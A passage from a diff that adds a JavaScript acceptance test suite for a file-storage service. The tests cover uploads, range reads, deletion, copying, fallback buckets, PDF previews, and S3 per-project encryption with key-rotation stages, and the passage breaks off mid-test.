32 : 0 + + const BUCKET_NAMES = [ + process.env.GCS_USER_FILES_BUCKET_NAME, + process.env.GCS_TEMPLATE_FILES_BUCKET_NAME, + `${process.env.GCS_USER_FILES_BUCKET_NAME}-deleted`, + `${process.env.GCS_TEMPLATE_FILES_BUCKET_NAME}-deleted`, + ] + + before('start filestore with new settings', async function () { + // create the app with the relevant filestore settings + Settings.filestore = backendSettings + app = new FilestoreApp() + await app.runServer() + }) + + if (backendSettings.gcs) { + before('create gcs buckets', async function () { + // create test buckets for gcs + const storage = new Storage(Settings.filestore.gcs.endpoint) + for (const bucketName of BUCKET_NAMES) { + await storage.createBucket(bucketName) + } + }) + + after('delete gcs buckets', async function () { + // tear down all the gcs buckets + const storage = new Storage(Settings.filestore.gcs.endpoint) + for (const bucketName of BUCKET_NAMES) { + const bucket = storage.bucket(bucketName) + await bucket.deleteFiles() + await bucket.delete() + } + }) + } + + after('stop filestore app', async function () { + await app.stop() + }) + + beforeEach('fetch previous egress metric', async function () { + // retrieve previous metrics from the app + if (['s3', 's3SSEC', 'gcs'].includes(Settings.filestore.backend)) { + metricPrefix = Settings.filestore.backend.replace('SSEC', '') + previousEgress = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_egress` + ) + } + projectId = new ObjectId().toString() + otherProjectId = new ObjectId().toString() + }) + + it('should send a 200 for the status endpoint', async function () { + const response = await fetch(`${filestoreUrl}/status`) + expect(response.status).to.equal(200) + const body = await response.text() + expect(body).to.contain('filestore') + expect(body).to.contain('up') + }) + + describe('with a file on the server', function () { + let fileId, fileUrl, constantFileContent + + const localFileReadPath = + '/tmp/filestore_acceptance_tests_file_read.txt' + + beforeEach('upload file', async function () { + fileId = new ObjectId().toString() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + constantFileContent = [ + 'hello world', + `line 2 goes here ${Math.random()}`, + 'there are 3 lines in all', + ].join('\n') + + await fsWriteFile(localFileReadPath, constantFileContent) + + const readStream = fs.createReadStream(localFileReadPath) + const res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + }) + + beforeEach('retrieve previous ingress metric', async function () { + // The upload request can bump the ingress metric. + // The content hash validation might require a full download + // in case the ETag field of the upload response is not a md5 sum. 
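+ // The prom counters are cumulative, so the assertions below always
+ // compare against these snapshots (e.g. metric - previousIngress)
+ // rather than against absolute values.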
+ if (['s3', 's3SSEC', 'gcs'].includes(Settings.filestore.backend)) {
+ previousIngress = await TestHelper.getMetric(
+ filestoreUrl,
+ `${metricPrefix}_ingress`
+ )
+ }
+ })
+
+ it('should return 404 for a non-existent id', async function () {
+ const url = fileUrl + '___this_is_clearly_wrong___'
+ const response = await fetch(url)
+ expect(response.status).to.equal(404)
+ })
+
+ it('should return the file size on a HEAD request', async function () {
+ const expectedLength = Buffer.byteLength(constantFileContent)
+ const res = await fetch(fileUrl, { method: 'HEAD' })
+ expect(res.status).to.equal(200)
+ expect(res.headers.get('Content-Length')).to.equal(
+ expectedLength.toString()
+ )
+ })
+
+ it('should be able to get the file back', async function () {
+ const res = await fetch(fileUrl)
+ const body = await res.text()
+ expect(body).to.equal(constantFileContent)
+ })
+
+ it('should send a 200 for the health-check endpoint using the file', async function () {
+ Settings.health_check = {
+ project_id: projectId,
+ file_id: fileId,
+ }
+ const response = await fetch(`${filestoreUrl}/health_check`)
+ expect(response.status).to.equal(200)
+ const body = await response.text()
+ expect(body).to.equal('OK')
+ })
+
+ it('should not leak a socket', async function () {
+ const res = await fetch(fileUrl)
+ if (!res.ok) throw new Error(res.statusText)
+ await res.text()
+ await expectNoSockets()
+ })
+
+ it('should be able to get back the first 9 bytes of the file', async function () {
+ const res = await fetch(fileUrl, { headers: { Range: 'bytes=0-8' } })
+ const body = await res.text()
+ expect(body).to.equal('hello wor')
+ })
+
+ it('should be able to get back bytes 4 through 10 of the file', async function () {
+ const res = await fetch(fileUrl, { headers: { Range: 'bytes=4-10' } })
+ const body = await res.text()
+ expect(body).to.equal('o world')
+ })
+
+ it('should be able to delete the file', async function () {
+ const response = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response.status).to.equal(204)
+ const response2 = await fetch(fileUrl)
+ expect(response2.status).to.equal(404)
+ })
+
+ it('should be able to copy files', async function () {
+ const newProjectID = new ObjectId().toString()
+ const newFileId = new ObjectId().toString()
+ const newFileUrl = `${filestoreUrl}/project/${newProjectID}/file/${newFileId}`
+ let response = await fetch(newFileUrl, {
+ method: 'PUT',
+ body: JSON.stringify({
+ source: {
+ project_id: projectId,
+ file_id: fileId,
+ },
+ }),
+ headers: {
+ 'Content-Type': 'application/json',
+ },
+ })
+ expect(response.status).to.equal(200)
+ response = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response.status).to.equal(204)
+ response = await fetch(newFileUrl)
+ const body = await response.text()
+ expect(body).to.equal(constantFileContent)
+ })
+
+ it('should be able to overwrite the file', async function () {
+ const newContent = `here is some different content, ${Math.random()}`
+ const readStream = streamifier.createReadStream(newContent)
+ await fetch(fileUrl, { method: 'POST', body: readStream })
+
+ const response = await fetch(fileUrl)
+ const body = await response.text()
+ expect(body).to.equal(newContent)
+ })
+
+ describe('IfNoneMatch', function () {
+ if (backendSettings.backend === 'fs') {
+ it('should refuse to handle IfNoneMatch', async function () {
+ await expect(
+ app.persistor.sendStream(
+ Settings.filestore.stores.user_files,
+ `${projectId}/${fileId}`,
+ fs.createReadStream(localFileReadPath),
+ { ifNoneMatch: '*' }
+ )
+
).to.be.rejectedWith(NotImplementedError) + }) + } else { + it('should reject sendStream on the same key with IfNoneMatch', async function () { + await expect( + app.persistor.sendStream( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}`, + fs.createReadStream(localFileReadPath), + { ifNoneMatch: '*' } + ) + ).to.be.rejectedWith(AlreadyWrittenError) + }) + it('should allow sendStream on a different key with IfNoneMatch', async function () { + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}-other`, + fs.createReadStream(localFileReadPath), + { ifNoneMatch: '*' } + ) + }) + } + }) + + if (backendSettings.backend !== 'fs') { + it('should record an egress metric for the upload', async function () { + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_egress` + ) + expect(metric - previousEgress).to.equal( + constantFileContent.length + dataEncryptionKeySize + ) + }) + + it('should record an ingress metric when downloading the file', async function () { + const response = await fetch(fileUrl) + expect(response.ok).to.be.true + await response.text() + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_ingress` + ) + expect(metric - previousIngress).to.equal( + constantFileContent.length + dataEncryptionKeySize + ) + }) + + it('should record an ingress metric for a partial download', async function () { + const response = await fetch(fileUrl, { + headers: { Range: 'bytes=0-8' }, + }) + expect(response.ok).to.be.true + await response.text() + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_ingress` + ) + expect(metric - previousIngress).to.equal(9 + dataEncryptionKeySize) + }) + } + }) + + describe('with multiple files', function () { + let fileIds, fileUrls, otherFileUrls, projectUrl, otherProjectUrl + const localFileReadPaths = [ + '/tmp/filestore_acceptance_tests_file_read_1.txt', + '/tmp/filestore_acceptance_tests_file_read_2.txt', + '/tmp/filestore_acceptance_tests_file_read_3.txt', + ] + const constantFileContents = [ + [ + 'hello world', + `line 2 goes here ${Math.random()}`, + 'there are 3 lines in all', + ].join('\n'), + [ + `for reference: ${Math.random()}`, + 'cats are the best animals', + 'wombats are a close second', + ].join('\n'), + [ + `another file: ${Math.random()}`, + 'with multiple lines', + 'the end', + ].join('\n'), + ] + + before('create local files', async function () { + return await Promise.all([ + fsWriteFile(localFileReadPaths[0], constantFileContents[0]), + fsWriteFile(localFileReadPaths[1], constantFileContents[1]), + fsWriteFile(localFileReadPaths[2], constantFileContents[2]), + ]) + }) + + beforeEach('upload two files', async function () { + projectUrl = `${filestoreUrl}/project/${projectId}` + otherProjectUrl = `${filestoreUrl}/project/${otherProjectId}` + fileIds = [ + new ObjectId().toString(), + new ObjectId().toString(), + new ObjectId().toString(), + ] + fileUrls = [ + `${projectUrl}/file/${fileIds[0]}`, + `${projectUrl}/file/${fileIds[1]}`, + ] + otherFileUrls = [`${otherProjectUrl}/file/${fileIds[2]}`] + + await Promise.all([ + fetch(fileUrls[0], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[0]), + }), + fetch(fileUrls[1], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[1]), + }), + fetch(otherFileUrls[0], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[2]), + }), + ]) + }) + + it('should get the directory size', async function () { + const response = 
await fetch( + `${filestoreUrl}/project/${projectId}/size` + ) + const body = await response.text() + expect(parseInt(JSON.parse(body)['total bytes'])).to.equal( + constantFileContents[0].length + constantFileContents[1].length + ) + }) + + it('should store the files', async function () { + for (const index in fileUrls) { + const response = await fetch(fileUrls[index]) + const body = await response.text() + expect(body).to.equal(constantFileContents[index]) + } + }) + + it('should be able to delete the project', async function () { + let response = await fetch(projectUrl, { method: 'DELETE' }) + expect(response.status).to.equal(204) + + for (const index in fileUrls) { + response = await fetch(fileUrls[index]) + expect(response.status).to.equal(404) + } + }) + + it('should not delete files in other projects', async function () { + for (const index in otherFileUrls) { + const response = await fetch(otherFileUrls[index]) + expect(response.status).to.equal(200) + } + }) + + it('should not delete a partial project id', async function () { + const response = await fetch(`${filestoreUrl}/project/5`, { + method: 'DELETE', + }) + expect(response.status).to.equal(400) + }) + }) + + describe('with a large file', function () { + this.timeout(1000 * 20) + let fileId, fileUrl, largeFileContent, error + + beforeEach('upload large file', async function () { + fileId = new ObjectId().toString() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + largeFileContent = '_wombat_'.repeat(1024 * 1024) // 8 megabytes + largeFileContent += Math.random() + + const readStream = streamifier.createReadStream(largeFileContent) + const res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + }) + + it('should be able to get the file back', async function () { + const response = await fetch(fileUrl) + const body = await response.text() + expect(body).to.equal(largeFileContent) + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + + it('should not leak a socket', async function () { + const response = await fetch(fileUrl) + await response.text() + await expectNoSockets() + }) + + it('should not leak a socket if the connection is aborted', async function () { + const controller = new AbortController() + const response = await fetch(fileUrl, { signal: controller.signal }) + expect(response.ok).to.be.true + controller.abort() + await expectNoSockets() + }) + }) + + if ( + (backendSettings.backend === 's3' && !backendSettings.fallback) || + (backendSettings.backend === 'gcs' && + backendSettings.fallback?.backend === 's3') + ) { + describe('with a file in a specific bucket', function () { + let constantFileContent, fileId, fileUrl, bucketName + + beforeEach('upload file into random bucket', async function () { + constantFileContent = `This is a file in a different S3 bucket ${Math.random()}` + fileId = new ObjectId().toString() + bucketName = `random-bucket-${new ObjectId().toString()}` + fileUrl = `${filestoreUrl}/bucket/${bucketName}/key/${fileId}` + + const s3 = new S3Persistor({ + ...s3Config(), + key: process.env.MINIO_ROOT_USER, + secret: process.env.MINIO_ROOT_PASSWORD, + })._getClientForBucket(bucketName) + await s3 + .createBucket({ + Bucket: bucketName, + }) + .promise() + await s3 + .upload({ + Bucket: bucketName, + Key: fileId, + Body: constantFileContent, + }) + .promise() + }) + + it('should get the file from the specified bucket', async function () { + const response = await fetch(fileUrl) + const body 
= await response.text() + expect(body).to.equal(constantFileContent) + }) + }) + } + + if (backendSettings.backend === 'gcs') { + describe('when deleting a file in GCS', function () { + let fileId, fileUrl, content, error, dateBefore, dateAfter + + beforeEach('upload and delete file', async function () { + fileId = new ObjectId() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + content = '_wombat_' + Math.random() + + const readStream = streamifier.createReadStream(content) + let res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + dateBefore = new Date() + res = await fetch(fileUrl, { method: 'DELETE' }) + dateAfter = new Date() + if (!res.ok) throw new Error(res.statusText) + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + + it('should copy the file to the deleted-files bucket', async function () { + let date = dateBefore + const keys = [] + while (date <= dateAfter) { + keys.push(`${projectId}/${fileId}-${date.toISOString()}`) + date = new Date(date.getTime() + 1) + } + await TestHelper.expectPersistorToHaveSomeFile( + app.persistor, + `${Settings.filestore.stores.user_files}-deleted`, + keys, + content + ) + }) + + it('should remove the file from the original bucket', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor, + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + }) + }) + } + + if (backendSettings.fallback) { + describe('with a fallback', function () { + let constantFileContent, + fileId, + fileKey, + fileUrl, + bucket, + fallbackBucket + + beforeEach('prepare fallback', function () { + constantFileContent = `This is yet more file content ${Math.random()}` + fileId = new ObjectId().toString() + fileKey = `${projectId}/${fileId}` + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + bucket = Settings.filestore.stores.user_files + fallbackBucket = Settings.filestore.fallback.buckets[bucket] + }) + + describe('with a file in the fallback bucket', function () { + beforeEach('upload into fallback', async function () { + await TestHelper.uploadStringToPersistor( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + it('should not find file in the primary', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey + ) + }) + + it('should find the file in the fallback', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + describe('when copyOnMiss is disabled', function () { + beforeEach('swap copyOnMiss=false', function () { + app.persistor.settings.copyOnMiss = false + }) + + it('should fetch the file', async function () { + const res = await fetch(fileUrl) + const body = await res.text() + expect(body).to.equal(constantFileContent) + }) + + it('should not copy the file to the primary', async function () { + const response = await fetch(fileUrl) + expect(response.ok).to.be.true + await response.text() + + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey + ) + }) + }) + + describe('when copyOnMiss is enabled', function () { + beforeEach('swap copyOnMiss=true', function () { + app.persistor.settings.copyOnMiss = true + }) + + it('should fetch the file', async function () { + const res = await fetch(fileUrl) + const body = 
await res.text()
+ expect(body).to.equal(constantFileContent)
+ })
+
+ it('copies the file to the primary', async function () {
+ const response = await fetch(fileUrl)
+ expect(response.ok).to.be.true
+ await response.text()
+ // wait for the file to copy in the background
+ await msleep(1000)
+
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+ })
+
+ describe('when copying a file', function () {
+ let newFileId, newFileUrl, newFileKey, opts
+
+ beforeEach('prepare to copy file', function () {
+ const newProjectID = new ObjectId().toString()
+ newFileId = new ObjectId().toString()
+ newFileUrl = `${filestoreUrl}/project/${newProjectID}/file/${newFileId}`
+ newFileKey = `${newProjectID}/${newFileId}`
+
+ opts = {
+ method: 'put',
+ body: JSON.stringify({
+ source: {
+ project_id: projectId,
+ file_id: fileId,
+ },
+ }),
+ headers: {
+ 'Content-Type': 'application/json',
+ },
+ }
+ })
+
+ describe('when copyOnMiss is false', function () {
+ beforeEach('copy with copyOnMiss=false', async function () {
+ app.persistor.settings.copyOnMiss = false
+
+ const response = await fetch(newFileUrl, opts)
+ expect(response.status).to.equal(200)
+ })
+
+ it('should leave the old file in the old bucket', async function () {
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+
+ it('should not create a new file in the old bucket', async function () {
+ await TestHelper.expectPersistorNotToHaveFile(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ newFileKey
+ )
+ })
+
+ it('should create a new file in the new bucket', async function () {
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ newFileKey,
+ constantFileContent
+ )
+ })
+
+ it('should not copy the old file to the primary with the old key', async function () {
+ // wait for the file to copy in the background
+ await msleep(1000)
+
+ await TestHelper.expectPersistorNotToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey
+ )
+ })
+ })
+
+ describe('when copyOnMiss is true', function () {
+ beforeEach('copy with copyOnMiss=true', async function () {
+ app.persistor.settings.copyOnMiss = true
+
+ const response = await fetch(newFileUrl, opts)
+ expect(response.status).to.equal(200)
+ })
+
+ it('should leave the old file in the old bucket', async function () {
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+
+ it('should not create a new file in the old bucket', async function () {
+ await TestHelper.expectPersistorNotToHaveFile(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ newFileKey
+ )
+ })
+
+ it('should create a new file in the new bucket', async function () {
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ newFileKey,
+ constantFileContent
+ )
+ })
+
+ it('should copy the old file to the primary with the old key', async function () {
+ // wait for the file to copy in the background
+ await msleep(1000)
+
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+ })
+ })
+ })
+
+ describe('when sending a file', function () {
+ beforeEach('upload file', async function () {
+ const readStream =
+ streamifier.createReadStream(constantFileContent)
+ const res = await fetch(fileUrl, {
+ method: 'POST',
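+ // node-fetch accepts a Readable as the body, so the upload is
+ // streamed rather than buffered in memory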
+ body: readStream,
+ })
+ if (!res.ok) throw new Error(res.statusText)
+ })
+
+ it('should store the file on the primary', async function () {
+ await TestHelper.expectPersistorToHaveFile(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+
+ it('should not store the file on the fallback', async function () {
+ await TestHelper.expectPersistorNotToHaveFile(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ `${projectId}/${fileId}`
+ )
+ })
+ })
+
+ describe('when deleting a file', function () {
+ describe('when the file exists on the primary', function () {
+ beforeEach('upload into primary', async function () {
+ await TestHelper.uploadStringToPersistor(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+
+ it('should delete the file', async function () {
+ const response1 = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response1.status).to.equal(204)
+ const response2 = await fetch(fileUrl)
+ expect(response2.status).to.equal(404)
+ })
+ })
+
+ describe('when the file exists on the fallback', function () {
+ beforeEach('upload into fallback', async function () {
+ await TestHelper.uploadStringToPersistor(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ fileKey,
+ constantFileContent
+ )
+ })
+
+ it('should delete the file', async function () {
+ const response1 = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response1.status).to.equal(204)
+ const response2 = await fetch(fileUrl)
+ expect(response2.status).to.equal(404)
+ })
+ })
+
+ describe('when the file exists on both the primary and the fallback', function () {
+ beforeEach(
+ 'upload into both primary and fallback',
+ async function () {
+ await TestHelper.uploadStringToPersistor(
+ app.persistor.primaryPersistor,
+ bucket,
+ fileKey,
+ constantFileContent
+ )
+ await TestHelper.uploadStringToPersistor(
+ app.persistor.fallbackPersistor,
+ fallbackBucket,
+ fileKey,
+ constantFileContent
+ )
+ }
+ )
+
+ it('should delete the files', async function () {
+ const response1 = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response1.status).to.equal(204)
+ const response2 = await fetch(fileUrl)
+ expect(response2.status).to.equal(404)
+ })
+ })
+
+ describe('when the file does not exist', function () {
+ it('should return 204', async function () {
+ // S3 doesn't give us a 404 when the object doesn't exist, so to stay
+ // consistent we merrily return 204 ourselves here as well
+ const response = await fetch(fileUrl, { method: 'DELETE' })
+ expect(response.status).to.equal(204)
+ })
+ })
+ })
+ })
+ }
+
+ describe('with a pdf file', function () {
+ let fileId, fileUrl, localFileSize
+ const localFileReadPath = Path.resolve(
+ __dirname,
+ '../../fixtures/test.pdf'
+ )
+
+ beforeEach('upload test.pdf', async function () {
+ fileId = new ObjectId().toString()
+ fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}`
+ const stat = await fsStat(localFileReadPath)
+ localFileSize = stat.size
+ const readStream = fs.createReadStream(localFileReadPath)
+ const res = await fetch(fileUrl, { method: 'POST', body: readStream })
+ if (!res.ok) throw new Error(res.statusText)
+ })
+
+ it('should be able to get the file back', async function () {
+ const response = await fetch(fileUrl)
+ const body = await response.text()
+ expect(body.substring(0, 8)).to.equal('%PDF-1.5')
+ })
+
+ if (backendSettings.backend !== 'fs') {
+ it('should record an egress metric for the upload', async function () {
+ const metric = await TestHelper.getMetric(
+ filestoreUrl,
+ `${metricPrefix}_egress`
+ )
+ expect(metric - previousEgress).to.equal(
+ localFileSize + dataEncryptionKeySize
+ )
+ })
+ }
+
+ describe('getting the preview image', function () {
+ this.timeout(1000 * 20)
+ let previewFileUrl
+
+ beforeEach('prepare previewFileUrl for preview', function () {
+ previewFileUrl = `${fileUrl}?style=preview`
+ })
+
+ it('should not time out', async function () {
+ const response = await fetch(previewFileUrl)
+ expect(response.status).to.equal(200)
+ await response.arrayBuffer()
+ })
+
+ it('should respond with image data', async function () {
+ // note: this test relies on the imagemagick conversion working
+ const response = await fetch(previewFileUrl)
+ expect(response.status).to.equal(200)
+ const body = await response.text()
+ expect(body.length).to.be.greaterThan(400)
+ expect(body.substr(1, 3)).to.equal('PNG')
+ })
+ })
+
+ describe('warming the cache', function () {
+ this.timeout(1000 * 20)
+ let previewFileUrl
+
+ beforeEach('prepare previewFileUrl for cacheWarm', function () {
+ previewFileUrl = `${fileUrl}?style=preview&cacheWarm=true`
+ })
+
+ it('should not time out', async function () {
+ const response = await fetch(previewFileUrl)
+ expect(response.status).to.equal(200)
+ await response.arrayBuffer()
+ })
+
+ it('should not leak sockets', async function () {
+ const response1 = await fetch(previewFileUrl)
+ expect(response1.status).to.equal(200)
+ // do not read the response body, should be destroyed immediately
+ const response2 = await fetch(previewFileUrl)
+ expect(response2.status).to.equal(200)
+ // do not read the response body, should be destroyed immediately
+ await expectNoSockets()
+ })
+
+ it("should respond with only an 'OK'", async function () {
+ // note: this test relies on the imagemagick conversion working
+ const response = await fetch(previewFileUrl)
+ const body = await response.text()
+ expect(body).to.equal('OK')
+ })
+ })
+ })
+
+ describe('with server side encryption', function () {
+ if (backendSettings.backend !== 's3SSEC') return
+
+ before('sanity check top-level variable', function () {
+ expect(dataEncryptionKeySize).to.equal(32)
+ })
+
+ let fileId1,
+ fileId2,
+ fileKey1,
+ fileKey2,
+ fileKeyOtherProject,
+ fileUrl1,
+ fileUrl2
+ beforeEach('prepare ids', function () {
+ fileId1 = new ObjectId().toString()
+ fileId2 = new ObjectId().toString()
+ fileKey1 = `${projectId}/${fileId1}`
+ fileKey2 = `${projectId}/${fileId2}`
+ fileKeyOtherProject = `${new ObjectId().toString()}/${new ObjectId().toString()}`
+ fileUrl1 = `${filestoreUrl}/project/${projectId}/file/${fileId1}`
+ fileUrl2 = `${filestoreUrl}/project/${projectId}/file/${fileId2}`
+ })
+
+ beforeEach('ensure DEK is missing', async function () {
+ // Cannot use test helper expectPersistorNotToHaveFile here, we need to use the KEK.
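+ // (the DEK is itself stored encrypted under the KEK, so only a
+ // persistor holding a matching KEK can even check for its existence)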
+ await expect(
+ app.persistor.getDataEncryptionKeySize(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ ).to.rejectedWith(NotFoundError)
+ })
+
+ async function createRandomContent(url, suffix = '') {
+ const content = Math.random().toString() + suffix
+ const res = await fetch(url, {
+ method: 'POST',
+ body: Stream.Readable.from([content]),
+ })
+ if (!res.ok) throw new Error(res.statusText)
+ return async () => {
+ const res = await fetch(url, { method: 'GET' })
+ if (!res.ok) throw new Error(res.statusText)
+ expect(await res.text()).to.equal(content)
+ }
+ }
+
+ it('should create a DEK when asked explicitly', async function () {
+ await app.persistor.generateDataEncryptionKey(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ expect(
+ await app.persistor.getDataEncryptionKeySize(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ ).to.equal(32)
+ })
+
+ it('should create a DEK from writes', async function () {
+ await createRandomContent(fileUrl1)
+ expect(
+ await app.persistor.getDataEncryptionKeySize(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ ).to.equal(32)
+ })
+
+ it('should not create a DEK from reads', async function () {
+ const res = await fetch(fileUrl1, {
+ method: 'GET',
+ })
+ if (res.status !== 404) throw new Error(`${res.status} should be 404`)
+
+ // Cannot use test helper expectPersistorNotToHaveFile here, we need to use the KEK.
+ await expect(
+ app.persistor.getDataEncryptionKeySize(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ ).to.rejectedWith(NotFoundError)
+ })
+
+ it('should never overwrite a data encryption key', async function () {
+ const checkGET = await createRandomContent(fileUrl1)
+
+ await expect(
+ app.persistor.generateDataEncryptionKey(
+ backendSettings.stores.user_files,
+ fileKey1
+ )
+ ).to.rejectedWith(AlreadyWrittenError)
+
+ await checkGET()
+ })
+
+ it('should re-use the data encryption key after a write', async function () {
+ const checkGET1 = await createRandomContent(fileUrl1, '1')
+ const checkGET2 = await createRandomContent(fileUrl2, '2')
+ await checkGET1()
+ await checkGET2()
+ })
+
+ describe('kek rotation', function () {
+ const newKEK = new RootKeyEncryptionKey(
+ crypto.generateKeySync('aes', { length: 256 }).export(),
+ Buffer.alloc(32)
+ )
+ const oldKEK = new RootKeyEncryptionKey(
+ crypto.generateKeySync('aes', { length: 256 }).export(),
+ Buffer.alloc(32)
+ )
+ const migrationStep0 = new PerProjectEncryptedS3Persistor({
+ ...s3SSECConfig(),
+ automaticallyRotateDEKEncryption: false,
+ async getRootKeyEncryptionKeys() {
+ return [oldKEK] // only old key
+ },
+ })
+ const migrationStep1 = new PerProjectEncryptedS3Persistor({
+ ...s3SSECConfig(),
+ automaticallyRotateDEKEncryption: false,
+ async getRootKeyEncryptionKeys() {
+ return [oldKEK, newKEK] // new key as fallback
+ },
+ })
+ const migrationStep2 = new PerProjectEncryptedS3Persistor({
+ ...s3SSECConfig(),
+ automaticallyRotateDEKEncryption: true, // <- rotation enabled, unlike migrationStep1
+ async getRootKeyEncryptionKeys() {
+ return [newKEK, oldKEK] // old keys as fallback
+ },
+ })
+ const migrationStep3 = new PerProjectEncryptedS3Persistor({
+ ...s3SSECConfig(),
+ automaticallyRotateDEKEncryption: true,
+ async getRootKeyEncryptionKeys() {
+ return [newKEK] // only new key
+ },
+ })
+
+ async function checkWrites(
+ fileKey,
+ writer,
+ readersSuccess,
+ readersFailed
+ ) {
+ const content = Math.random().toString()
+ await writer.sendStream(
+ Settings.filestore.stores.user_files,
+ fileKey,
+ Stream.Readable.from([content])
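+ // writes go through the persistor directly rather than the HTTP API,
+ // so the KEK set of this particular migration step is what gets used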
+ ) + + for (const persistor of readersSuccess) { + await TestHelper.expectPersistorToHaveFile( + persistor, + backendSettings.stores.user_files, + fileKey, + content + ) + } + + for (const persistor of readersFailed) { + await expect( + TestHelper.expectPersistorToHaveFile( + persistor, + backendSettings.stores.user_files, + fileKey, + content + ) + ).to.be.rejectedWith(NoKEKMatchedError) + } + } + + const stages = [ + { + name: 'stage 0 - [old]', + prev: migrationStep0, + cur: migrationStep0, + fail: [migrationStep3], + }, + { + name: 'stage 1 - [old,new]', + prev: migrationStep0, + cur: migrationStep1, + fail: [], + }, + { + name: 'stage 2 - [new,old]', + prev: migrationStep1, + cur: migrationStep2, + fail: [], + }, + { + name: 'stage 3 - [new]', + prev: migrationStep2, + cur: migrationStep3, + fail: [migrationStep0], + }, + ] + + for (const { name, prev, cur, fail } of stages) { + describe(name, function () { + this.timeout(1000 * 30) + + it('can read old writes', async function () { + await checkWrites(fileKey1, prev, [prev, cur], fail) + await checkWrites(fileKey2, prev, [prev, cur], fail) // check again after access + await checkWrites(fileKeyOtherProject, prev, [prev, cur], fail) + }) + it('can read new writes', async function () { + await checkWrites(fileKey1, prev, [prev, cur], fail) + await checkWrites(fileKey2, cur, [prev, cur], fail) // check again after access + await checkWrites(fileKeyOtherProject, cur, [prev, cur], fail) + }) + }) + } + + describe('full migration', function () { + it('can read old writes if rotated in sequence', async function () { + await checkWrites( + fileKey1, + migrationStep0, + [ + migrationStep0, + migrationStep1, + migrationStep2, // migrates + migrationStep3, + ], + [] + ) + }) + it('cannot read/write if not rotated', async function () { + await checkWrites( + fileKey1, + migrationStep0, + [migrationStep0], + [migrationStep3] + ) + }) + }) + }) + + /** @type {import('aws-sdk/clients/s3')} */ + let s3Client + before('create s3 client', function () { + s3Client = new S3Persistor(s3Config())._getClientForBucket('') + }) + + async function checkDEKStorage({ + dekBucketKeys = [], + userFilesBucketKeys = [], + }) { + await createRandomContent(fileUrl1) + + const { Contents: dekEntries } = await s3Client + .listObjectsV2({ + Bucket: process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME, + Prefix: `${projectId}/`, + }) + .promise() + expect(dekEntries).to.have.length(dekBucketKeys.length) + // Order is not predictable, use members + expect(dekEntries.map(o => o.Key)).to.have.members(dekBucketKeys) + + const { Contents: userFilesEntries } = await s3Client + .listObjectsV2({ + Bucket: backendSettings.stores.user_files, + Prefix: `${projectId}/`, + }) + .promise() + expect(userFilesEntries).to.have.length(userFilesBucketKeys.length) + // Order is not predictable, use members + expect(userFilesEntries.map(o => o.Key)).to.have.members( + userFilesBucketKeys + ) + } + + it('should use a custom bucket for DEKs', async function () { + await checkDEKStorage({ + dekBucketKeys: [`${projectId}/dek`], + userFilesBucketKeys: [fileKey1], + }) + }) + + describe('deleteDirectory', function () { + let checkGET1, checkGET2 + beforeEach('create files', async function () { + checkGET1 = await createRandomContent(fileUrl1, '1') + checkGET2 = await createRandomContent(fileUrl2, '2') + }) + it('should refuse to delete top-level 